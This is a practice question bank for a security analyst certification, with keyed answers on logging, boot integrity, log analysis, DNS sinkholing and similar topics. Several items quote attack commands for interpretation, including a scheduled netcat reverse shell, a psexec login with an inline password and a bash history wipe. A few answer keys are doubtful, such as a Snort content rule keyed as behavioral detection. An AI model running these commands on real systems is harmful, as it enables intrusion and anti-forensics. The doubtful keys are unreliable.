DOMAIN 2 CSIT


Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort? A. Implement logging B. Validate all inputs C. Parameterize queries D. Error and exception handling

A. Implement logging

What advantage does a virtual desktop infrastructure have when addressing data theft? A. No data is stored locally on the endpoint device B. Built-in DLP C. All data is encrypted at rest D. All data is stored locally on the endpoint device

A. No data is stored locally on the endpoint device

Barney's organization mandates fuzz testing for all applications before deploying them into production. Which one of the following issues is this testing methodology most likely to detect? A. Incorrect firewall rules B. Unvalidated input C. Missing operating system patches D. Unencrypted data transmission

B. Unvalidated input

Tom connects to a website using the Chrome web browser. The site uses TLS encryption and presents the digital certificate shown here. Which one of the following websites would not be covered by this certificate? A. nd.edu B. www.nd.edu C. www.business.nd.edu D. All of these sites would be covered by the certificate.

C. www.business.nd.edu

Gabby executes the following command. What is she doing? ps -aux | grep apache2 | grep root A. Searching for all files owned by root named apache2 B. Checking currently running processes with the word apache2 and root both appearing in the output of top C. Shutting down all apache2 processes run by root D. There is not enough information to answer this question.

B. Checking currently running processes with the word apache2 and root both appearing in the output of top

Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command. at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe What does it do? A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. B. It uses the AT command to dial a remote host via NetBIOS. C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.

A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.

During a periodic audit of account privileges, Rhonda reviews the account rights in an Active Directory domain for every administrative user and removes any rights to directories or systems that should no longer be available to the administrative users. What type of review is this? A. Manual review B. IAM assessment C. Mandatory audit review D. Discretional audit review

A. Manual review

Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this? A. Group Policy Object B. Organizational unit C. Active Directory forest D. Domain controller

A. Group Policy Object

Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model? A. 802.1x B. DMARC C. SPF D. 802.3

A. 802.1x

Rowan wants to block drive-by-downloads and bot command and control channels while redirecting potentially impacted systems to a warning message. What should she implement to do this? A. A DNS sinkhole B. A WAF C. An IDS D. A UEBA

A. A DNS sinkhole

Although both Secure Boot and Measured Boot processes rely on a chain of trust, only one validates the objects in the chain. Which technology does this and what process does it follow? A. A Secured Boot chain validates the boot objects using private keys to check against public keys already in the BIOS. B. A Measured Boot chain computes the hash of the next object in the chain and compares it to the hash of the previous object. C. A Secured Boot chain computes the hash of the next object in the chain and compares it to the hash of the previous object. D. A Measured Boot chain validates the boot objects using private keys to check against public keys already in the BIOS.

A. A Secured Boot chain validates the boot objects using private keys to check against public keys already in the BIOS.

Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat? A. Anomalies in privileged account usage B. Time-based login information C. A mobile device profile change D. DNS request anomalies

A. Anomalies in privileged account usage

While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of? A. Anomalous behavior B. Heuristic behavior C. Entity behavior D. Known-good behavior

A. Anomalous behavior

Security screws are an example of what type of control? A. Anti-tamper B. Detective C. Anti-theft D. Corrective

A. Anti-tamper

What practice is typical in a DevSecOps organization as part of a CI/CD pipeline? A. Automating some security gates B. Programmatic implementation of zero-day vulnerabilities C. Using security practitioners to control the flow of the CI/CD pipeline D. Removing security features from the IDE

A. Automating some security gates

What type of dedicated device is used in organizations that can generate keys, create and validate digital signatures, and provide cryptoprocessing to both encrypt and decrypt data? A. HSMs B. BGPs C. SSMs D. None of the above

A. HSMs

Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources? A. STIX and TAXII B. SAML and OCSP C. STIX and CAB D. SAML and TAXII

A. STIX and TAXII

Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it? A. Spoofing MAC addresses B. Providing valid credentials C. Spoofing IP addresses D. Providing fake credentials

A. Spoofing MAC addresses

Elliott wants to encrypt data sent between his servers. What protocol is most commonly used for secure web communications over a network? A. TLS B. SSL C. IPSec D. PPTP

A. TLS

Derek's organization has been working to recover from a recent malware infection that caused outages across the organization during an important part of their business cycle. In order to properly triage, what should Derek pay the most attention to first? A. The immediate impact on operations so that his team can restore functionality B. The total impact of the event so that his team can provide an accurate final report C. The immediate impact on operations so that his team can identify the likely threat actor D. The total impact of the event so that his team can build a new threat model for future use

A. The immediate impact on operations so that his team can restore functionality

Michelle wants to implement a static analysis security testing (SAST) tool into her continuous integration pipeline. What challenge could she run into if her organization uses multiple programming languages for components of their application stack that will be tested? A. They will have to ensure the scanner works with all of the languages chosen. B. They will have to compile all of the code to the same binary output language. C. They will have to run the applications in a sandbox. D. They will have to run the applications under the same execution environment.

A. They will have to ensure the scanner works with all of the languages chosen.

Sofía wants to ensure that the ICs in the new device that her commercial consumer products company is releasing cannot be easily reverse engineered. Which technique is not an appropriate means of meeting her requirement? A. Use a trusted foundry. B. Encase the IC in epoxy. C. Design the chip to zeroize sensitive data if its security encapsulation fails. D. Design the chip to handle out of spec voltages and clock signals.

A. Use a trusted foundry.

Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as? A. DNS masquerading B. DNS sinkholing C. DNS re-sequencing D. DNS hierarchy revision

B. DNS sinkholing

While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start          Duration  Proto  Src IP Addr:Port    Dst IP Addr:Port   Packets  Bytes  Flows
2019-07-11 13:06:46.343  21601804  TCP    10.1.1.1:1151->10.2.2.3:443           9473640  9.1 G  1
2019-07-11 13:06:46.551  21601804  TCP    10.2.2.3:443->10.1.1.1:1151           8345101  514 M  1
A. A web browsing session B. Data exfiltration C. Data infiltration D. A vulnerability scan

B. Data exfiltration

While analyzing a malware package, Ryan finds a list of hostnames shown here: earnestnessrealsitetest.com rvcxestnessrealsitetest.com hjbtestnessrealsitetest.com agekestnessrealsitetest.com sgjxestnessrealsitetest.com igjyestnessrealsitetest.com zxahestnessrealsitetest.com zfrpestnessrealsitetest.com hdquestnessrealsitetest.com umcuestnessrealsitetest.com hrbyestnessrealsitetest.com ysrtestnessrealsitetest.com kgteestnessrealsitetest.com hfsnestnessrealsitetest.com njxfestnessrealsitetest.com What has he likely found in the malware package? A. A RPG B. A DGA C. A SPT D. A FIN

B. A DGA

While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks on the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person? A. An encrypted RAT B. A VPN application C. A secure web browser D. A base64 encoded packet transfer utility

B. A VPN application

What is the key difference between a secured boot chain and a measured boot chain? A. A secured boot chain depends on a root of trust. B. A measured boot chain computes the hash of the next object in the chain and stores it securely. C. A secured boot chain computes the hash of the next object in the chain and stores it securely. D. A measured boot chain depends on a root of trust.

B. A measured boot chain computes the hash of the next object in the chain and stores it securely.

Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating "thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel." What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization? A. DKIM B. An awareness campaign C. Blocking all email from unknown senders D. SPF

B. An awareness campaign

Barcodes and RFID tags are both frequently used for what asset management practice? A. Asset disposition B. Asset tagging C. Asset acquisition D. Asset lifespan estimation

B. Asset tagging

Micah is designing a containerized application security environment and wants to ensure that the container images he is deploying do not introduce security issues due to vulnerable applications. What can he integrate into the CI/CD pipeline to help prevent this? A. Automated checking of application hashes against known good versions B. Automated vulnerability scanning C. Automated fuzz testing D. Automated updates

B. Automated vulnerability scanning

Betty wants to review the security logs on her Windows workstation. What tool should she use to do this? A. Secpol.msc B. Event Viewer C. Log Viewer D. Logview.msc

B. Event Viewer

Nathan downloads a BIOS update from Dell's website, and when he attempts to install it on the PC, he receives an error that the hash of the BIOS does not match the hash stored on Dell's servers. What type of protection is this? A. Full-disk encryption B. Firmware protection C. Operating system protection D. None of the above

B. Firmware protection

Maria wants to deploy an antimalware tool to detect zero-day malware. What type of detection method should she look for in her selected tool? A. Signature-based B. Heuristic-based C. Trend-based D. Availability-based

B. Heuristic-based

What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory? A. How often the directory is accessed B. If files in the directory have changed C. If sensitive data was copied out of the directory D. Who has viewed files in the directory

B. If files in the directory have changed

Adam is testing code written for a client-server application that handles financial information and notes that traffic is sent between the client and server via TCP port 80. What should he check next? A. If the server stores data in unencrypted form B. If the traffic is unencrypted C. If the systems are on the same network D. If usernames and passwords are sent as part of the traffic

B. If the traffic is unencrypted

Ian has been asked to deploy a secure wireless network in parallel with a public wireless network inside his organization's buildings. What type of segmentation should he implement to do so without adding additional costs and complexity? A. SSID segmentation B. Logical segmentation C. Physical segmentation D. WPA segmentation

B. Logical segmentation

Robert is reviewing a web application and the developers have offered four different responses to incorrect logins. Which of the following four responses is the most secure option? A. Login failed for user; invalid password B. Login failed; invalid user ID or password C. Login failed; invalid user ID D. Login failed; account does not exist

B. Login failed; invalid user ID or password

What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators? A. An IPS B. UEBA C. An IDS D. DMARC

B. UEBA

Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested? A. Install host firewalls on the systems B. Move to a NAT environment C. Install an IPS D. None of the above

B. Move to a NAT environment

The OWASP mobile application security checklist's cryptography requirements include a requirement that the application uses "proven implementations of cryptographic primitives." What does this requirement mean, and why is it in the checklist? A. Only use basic cryptographic techniques to ensure that developers can understand them B. Only use proven versions of cryptographic algorithms so that they will be secure C. Only use in-house developed and tested cryptographic algorithms to avoid known vulnerabilities D. Only use open source cryptographic techniques to ensure that their source code can be reviewed

B. Only use proven versions of cryptographic algorithms so that they will be secure

Nathan is reviewing PHP code for his organization and finds the following code in the application he is assessing. What technique is the developer using?
$stmt = $dbh->prepare("INSERT INTO REGISTRY (var1, var2) VALUES (:var1, :var2)");
$stmt->bindParam(':var1', $var1);
$stmt->bindParam(':var2', $var2);
A. Dynamic binding B. Parameterized queries C. Variable limitation D. None of the above

B. Parameterized queries

Local and domain administrator accounts, root accounts, and service accounts are all examples of what type of account? A. Monitored accounts B. Privileged accounts C. Root accounts D. Unprivileged accounts

B. Privileged accounts

Amira wants to deploy an open standard-based single sign-on (SSO) tool that supports both authentication and authorization. What open standard should she look for if she wants to federate with a broad variety of identity providers and service providers? A. LDAP B. SAML C. OAuth D. OpenID Connect

B. SAML

Faraj wants to use statistics gained from live analysis of his network to programmatically change its performance, routing, and optimization. Which of the following technologies is best suited to his needs? A. Serverless B. Software-defined networking C. Physical networking D. Virtual private networks (VPNs)

B. Software-defined networking

What technology is most commonly used to protect data in transit for modern web applications? A. VPN B. TLS C. SSL D. IPSec

B. TLS

How are eFuses used to prevent firmware downgrades? A. If they are burned, the firmware cannot be changed. B. The number of fuses burned indicates the current firmware level, preventing old versions from being installed. C. eFuses must be reset before firmware can be downgraded, requiring administrative access. D. eFuses cannot be used to prevent firmware downgrades.

B. The number of fuses burned indicates the current firmware level, preventing old versions from being installed.

Refer to the following scenario to answer the question: Chris is troubleshooting the firewall rulebase that appears here: The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong? A. The protocol is incorrect. B. The rules are misordered. C. The source port is not specified. D. There is no error in the rule, and Chris should check for other issues.

B. The rules are misordered.

Refer to the following scenario and image to answer the question. Bill is reviewing the authentication logs for a Linux system that he operates and encounters the following log entries:
Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 57478 ssh2 : RSA e5:f5:c1:46:bb:49:a1:43:da:9d:50:c5:37:bd:79:22
Aug 30 09:46:54 ip-172-30-0-62 ssh[3051]: pam_unix[sshd:session]: session opened for user ec2-user by (uid=0)
Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=ps/0 ; PWD=/home/ec2-user ; USER=root; COMMAND=/bin/bash
What account did the individual use to connect to the server? A. root B. ec2-user C. bash D. pam_unix

B. ec2-user

Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH? A. Add an iptables rule blocking root logins B. Add root to the sudoers group C. Change sshd_config to deny root login D. Add a network IPS rule to block root logins

C. Change sshd_config to deny root login

A web server and a web browser are examples of what type of platform? A. Embedded B. Firmware C. Client-server D. SOC

C. Client-server

While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening? A. A firewall is blocking connections from occurring B. An IPS is blocking connections from occurring C. A SYN flood D. An ACK blockage

C. A SYN flood

Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this? A. CSV B. Flat file C. API D. Email

C. API

Use the following scenario for the question. Scott has been asked to select a software development model for his organization, and knows that there are a number of models that may make sense for what he has been asked to accomplish. Use your knowledge of SDLC models to identify an appropriate model for each of the following requirements. Scott's organization needs basic functionality of the effort to become available as soon as possible and wants to involve the teams that will use it heavily to ensure that their needs are met. What model should Scott recommend? A. Waterfall B. Spiral C. Agile D. Rapid Application Development

C. Agile

Bobbi is deploying a single system that will be used to manage a very sensitive industrial control process. This system will operate in a standalone fashion and not have any connection to other networks. What strategy is Bobbi deploying to protect this SCADA system? A. Network segmentation B. VLAN isolation C. Airgapping D. Logical isolation

C. Airgapping

A tarpit, or a system that looks vulnerable but actually is intended to slow down attackers, is an example of what type of technique? A. A passive defense B. A sticky defense C. An active defense D. A reaction-based defense

C. An active defense

While reviewing web server logs, Danielle notices the following entry. What occurred? 10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200 A. A theme was changed B. A file was not found C. An attempt to edit the 404 page D. The 404 page was displayed

C. An attempt to edit the 404 page

Micro-probing, applying unexpected or out of specification voltages or clock signals, and freezing a device are all examples of types of attacks prevented by what type of technique? A. DRM B. Anti-theft C. Anti-tamper D. Fault tolerance

C. Anti-tamper

What type of operation occurs in a way that prevents another processor or I/O device from reading or writing to a memory location that is in use by the operation until the operation is complete? A. A complete operation B. A fractional operation C. Atomic execution D. Perpendicular execution

C. Atomic execution

Which of the following parties directly communicate with the end user during a SAML transaction? A. The relying party B. The SAML identity provider C. Both the relying party and the identity provider D. Neither the relying party nor the identity provider

C. Both the relying party and the identity provider

Brian is on the development team that his company has tasked with maintaining their organization's web application. He and his coworkers check code in multiple times a day, and the code is then verified and tested automatically. What is this practice called? A. Continuous delivery B. Repo-stuffing C. Continuous integration D. Time coding

C. Continuous integration

Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection? A. TLS B. VPN C. DLP D. FDE

C. DLP

When a DLP system is monitoring copy/paste, data displayed on a screen or captured from the screen, printing, and similar activities, what term describes the data's state? A. Data at rest B. Data in motion C. Data in use D. Data execution

C. Data in use

Alaina adds the openphish URL list to her SOAR tool and sees the following entries: http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/success.htm http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/sitekey.php http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/success.htm http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/ http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/ http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/sitekey.php What action should she take based on phishing URLs like these? A. Block the IP address at her border firewall B. Monitor for the IP address using her IDS C. Delete emails with the URL from inbound email D. Nothing, as these have not been confirmed

C. Delete emails with the URL from inbound email

What key functionality do enterprise privileged account management tools provide? A. Password creation B. Access control to individual systems C. Entitlement management across multiple systems D. Account expiration tools

C. Entitlement management across multiple systems

While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Which of the following has not occurred? A. A user has attempted to reauthenticate too many times. B. PAM is configured for three retries and will reject any additional retries in the same session. C. Fail2ban has blocked the SSH login attempts. D. Root is attempting to log in via SSH from the local host.

C. Fail2ban has blocked the SSH login attempts.

Use the following diagram and scenario for the question. Amanda has been assigned to lead the development of a new web application for her organization. She is following a standard SDLC model as shown here. Use the model and your knowledge of the software development life cycle to answer the following questions. Amanda's first task is to determine if there are alternative solutions that are more cost effective than in-house development. What phase is she in? A. Design B. Operations and maintenance C. Feasibility D. Analysis and requirements definition

C. Feasibility

While reviewing email headers, Saanvi notices an entry that reads: From: "John Smith, CIO" <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11]. Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com? A. John Smith's email was forwarded by someone at demo.com. B. John Smith's email was sent to someone at demo.com. C. The headers were forged to make it appear to have come from John Smith. D. The mail.demo.com server is a trusted email forwarding partner for example.com.

C. The headers were forged to make it appear to have come from John Smith.

While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured: ln /dev/null ~/.bash_history What action was this user attempting to perform? A. Enabling the Bash history B. Appending the contents of /dev/null to the Bash history C. Logging all shell commands to /dev/null D. Allowing remote access from the null shell

C. Logging all shell commands to /dev/null

Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this? A. Signature-based analysis B. A Babbage machine C. Machine learning D. Artificial network analysis

C. Machine learning

Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements? A. Whitelisting B. Port Security C. NAC D. EAP

C. NAC

The Open Web Application Security Project (OWASP) maintains a listing of the most important web application security controls. Which one of these items is least likely to appear on that list? A. Implement identity and authentication controls B. Implement appropriate access controls C. Obscure web interface locations D. Leverage security frameworks and libraries

C. Obscure web interface locations

Lucca wants to prevent brute-force attacks from succeeding against a web application. Which of the following is not a commonly implemented solution to help reduce the effectiveness of brute-force attacks? A. Multifactor authentication B. Account lockouts C. Password reuse D. CAPTCHAs

C. Password reuse

After conducting an nmap scan of his network from outside of his network, James notes that a large number of devices are showing three TCP ports open on public IP addresses: 9100, 515, and 631. What type of devices has he found, and how could he reduce his organization's attack surface? A. Wireless access points, disable remote administration B. Desktop workstations, enable the host firewall C. Printers, move the printers to an internal only IP range D. Network switches, enable encrypted administration mode

C. Printers, move the printers to an internal only IP range

Support for AES, 3DES, ECC, and SHA-256 are all examples of what? A. Encryption algorithms B. Hashing algorithms C. Processor security extensions D. Bus encryption modules

C. Processor security extensions

What type of attack is the use of query parameterization intended to prevent? A. Buffer overflows B. Cross-site scripting C. SQL injection D. Denial-of-service attacks

C. SQL injection

Ben adds a unique, randomly generated string to each password before it is hashed as part of his web application's password storage process. What is this process called? A. Mashing B. Hashing C. Salting D. Peppering

C. Salting

Liam wants to protect data at rest in an SaaS service. He knows that he needs to consider his requirements differently in his cloud environment than an on-premises environment. What option can he use to ensure that the data is encrypted when it is stored? A. Install a full-disk encryption tool. B. Install a column-level encryption. C. Select an SaaS service that supports encryption at rest. D. Hire an independent auditor to validate the encryption.

C. Select an SaaS service that supports encryption at rest.

Manesh downloads a new security tool and checks its MD5. What does she know about the software she downloaded if she receives the following message: root@demo:~# md5sum -c demo.md5 demo.txt: FAILED md5sum: WARNING: 1 computed checksum did NOT match A. The file has been corrupted. B. Attackers have modified the file. C. The files do not match. D. The test failed and provided no answer.

C. The files do not match.

While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in Windows console window. What has occurred? psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe A. The user has opened a command prompt on their workstation. B. The user has opened a command prompt on the desktop of a remote workstation. C. The user has opened an interactive command prompt as administrator on a remote workstation. D. The user has opened a command prompt on their workstation as Administrator.

C. The user has opened an interactive command prompt as administrator on a remote workstation.

Dev wants to use Secure Boot on a workstation. What technology must his workstation use to support Secure Boot? A. BIOS B. ROM C. UEFI D. TPM

C. UEFI

Which one of the following testing techniques is typically the final testing done before code is released to production? A. Unit testing B. Integration testing C. User acceptance testing D. Security testing

C. User acceptance testing

A system that Carlos is responsible for has been experiencing consistent denial-of-service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem? A. IP-based blacklisting B. Dropping all SYN packets C. Using a connection rate or volume-limiting filter per IP D. Using a route-blocking filter that analyzes common LOIC routes

C. Using a connection rate or volume-limiting filter per IP

While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred? root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7::: > daemon:*:16820:0:99999:7::: > bin:*:16820:0:99999:7::: > sys:*:16820:0:99999:7::: > sync:*:16820:0:99999:7::: > games:*:16820:0:99999:7::: > man:*:16820:0:99999:7::: > lp:*:16820:0:99999:7::: > mail:*:16820:0:99999:7::: > news:*:16820:0:99999:7::: > uucp:*:16820:0:99999:7::: > proxy:*:16820:0:99999:7::: > www-data:*:16820:0:99999:7::: > backup:*:16820:0:99999:7::: > list:*:16820:0:99999:7::: > irc:*:16820:0:99999:7::: A. The root account has been compromised. B. An account named daemon has been added. C. The shadow password file has been modified. D. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

D. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

Which hardware device is used on endpoint devices to store RSA encryption keys specific to that device to allow hardware authentication? A. An SSD B. A hard drive C. An MFA token D. A TPM

D. A TPM

Micah wants to use the data he has collected to help with his threat hunting practice. What type of approach is best suited to using large volumes of log and analytical data? A. Hypothesis-driven investigation B. Investigation based on indicators of compromise C. Investigation based on indications of attack D. AI/ML-based investigation

D. AI/ML-based investigation

At what point in a continuous integration (CI)/continuous delivery (CD) pipeline should security testing be performed? A. After code is checked into the repository B. After code is deployed into an automated test environment C. After the code is deployed into production D. All of the above

D. All of the above

Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators? A. Subject lines B. Email sender addresses C. Attachments D. All of the above

D. All of the above

The Snort IPS that Adam has configured includes a rule that reads alert tcp $EXTERNAL_NET any -> 10.0.10.0/24 80 (msg:"Alert!"; content:"http|3a|//www.example.com/download.php"; nocase; offset:12; classtype:web-application-activity; sid:5555555; rev:1;) What type of detection method is Adam using? A. Anomaly-based B. Trend-based C. Availability-based D. Behavioral-based

D. Behavioral-based

Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity? A. Prepare B. Engage C. Presence D. Effect

D. Effect

Padma is evaluating the security of an application developed within her organization. She would like to assess the application's security by supplying it with invalid inputs. What technique is Padma planning to use? A. Fault injection B. Stress testing C. Mutation testing D. Fuzz testing

D. Fuzz testing

Which of the items from the following list is not typically found in an email header? A. Sender IP address B. Date C. Receiver IP address D. Private key

D. Private key

Alex configured a Snort rule that reads: alert tcp any any -> any 22 (msg:"Detected!"; sid:10000004;) What will Alex's rule typically detect? A. FTP traffic B. Telnet traffic C. SMTP traffic D. SSH traffic

D. SSH traffic

Which of the following is not a typical capability of processor security extensions? A. Data and instruction path integrity checks B. Error detection for memory and registers C. Stack bounds checking D. Secure register wiping capabilities

D. Secure register wiping capabilities

The OWASP Session Management Cheat Sheet advises that session IDs are meaningless and recommends that they should be used only as an identifier on the client side. Why should a session ID not have additional information encoded in it, like the IP address of the client, their username, or other information? A. Processing complex session IDs will slow down the service. B. Session IDs cannot contain this information for legal reasons. C. Session IDs are sent to multiple different users, which would result in a data breach. D. Session IDs could be decoded, resulting in data leakage.

D. Session IDs could be decoded, resulting in data leakage.

Which of the following is not a limitation of a DNS sinkhole? A. They do not work on traffic sent directly to an IP address. B. They do not prevent malware from being executed. C. They can be bypassed using a hard-coded DNS server. D. They cannot block drive-by-download attempts.

D. They cannot block drive-by-download attempts.

Charles wants to provide additional security for his web application, which currently stores passwords in plaintext in a database. Which of the following options will best prevent theft of the database from resulting in exposed passwords? A. Encrypt the database of plaintext passwords B. Use MD5 and a salt C. Use SHA-1 and a salt D. Use bcrypt

D. Use bcrypt

Lara has been assigned to assess likely issues with an embedded system used for building automation and control. Which of the following software assurance issues is least likely to be of concern for her organization? A. Lack of updates and difficulty deploying them B. Long life cycle for the embedded devices C. Assumptions of network security where deployed D. Use of proprietary protocols

D. Use of proprietary protocols

Mike is in charge of the software testing process for his company. They perform a complete set of tests for each product throughout its lifespan. Use your knowledge of software assessment methods to answer the following question. A new web application has been written by the development team in Mike's company. They used an Agile process and have built a tool that fits all of the user stories that the participants from the division that asked for the application outlined. If they want to ensure that the functionality is appropriate for all users in the division, what type of testing should Mike perform? A. Stress testing B. Regression testing C. Static testing D. User acceptance testing

D. User acceptance testing

Which one of the following components is not normally part of an endpoint security suite? A. IPS B. Firewall C. Antimalware D. VPN

D. VPN

Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this? A. Reviewing the Message-ID to see if it has been incremented B. Checking for the In-Reply-To field C. Checking for the References field D. You cannot determine if a message was forwarded by analyzing the headers.

D. You cannot determine if a message was forwarded by analyzing the headers.
